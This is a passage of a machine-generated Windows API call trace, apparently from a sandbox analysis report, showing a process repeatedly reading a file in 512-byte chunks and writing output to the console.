lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.093] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.093] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: 
hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.094] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.094] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.095] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.095] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, 
lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.096] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.096] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, 
lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.097] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.098] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.099] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.100] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, 